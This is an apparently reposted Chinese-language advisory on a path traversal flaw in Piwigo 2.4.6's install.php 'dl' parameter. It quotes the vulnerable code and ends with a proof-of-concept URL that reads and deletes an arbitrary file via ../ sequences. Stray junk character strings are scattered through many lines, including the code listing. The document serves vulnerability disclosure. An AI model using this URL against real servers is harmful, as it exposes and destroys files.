Piwigo任意文件泄露和任意文件删除漏洞

admin

Piwigo是用PHP编写的相册脚本。
% s, _. j5 `( z  j
Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值，在实现上存在安全漏洞，攻击者可利用这些漏洞查看受影响计算机上的任意文件，删除受影响应用上下文内的任意文件。
====================================================================
# q$ ~1 ]8 |- @( C/install.php:
  t" K7 G. G8 K9 \8 \-------------
$ }: V+ L0 n2 c+ L6 S: _113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
0 R" B5 C  B1 x0 Q& P2 |114: {
115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
6 l: t! `7 o6 r  B2 V116:   header('Cache-Control: no-cache, must-revalidate');
117:   header('Pragma: no-cache');
118:   header('Content-Disposition: attachment; filename="database.inc.php"');
119:   header('Content-Transfer-Encoding: binary');
120:   header('Content-Length: '.filesize($filename));
  j5 D; l4 V5 t2 _$ `$ D7 F6 @+ b1 T0 o121:   echo file_get_contents($filename);
! A4 x! K* m# o& U  l# M122:   unlink($filename);
123:   exit();
) u1 @, ~% p  U3 D7 R124: }
====================================================================
, r% i7 `8 q* L$ Z2 B( e* V2 b
( Y3 g: k' x" N" dTested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a
" Y( K, W8 F  \/ ?
7 n! ^8 a6 ~/ L* z- fVulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience

Advisory ID: ZSL-2013-5127
9 v* h0 R7 J; s( M" ~Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843
! l6 ^' G: U. j' W  _$ h' p8 r' Z8 ?! e7 F
5 Y$ w- t7 R6 T3 f% s% f' v15.02.2013
# ]# y* ^2 A/ x9 V
  B! o9 w1 b8 L# O, m--
0 ^% u8 V% a: Y; t$ l- ^( Nhttp://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
, G9 x2 @/ n2 p3 P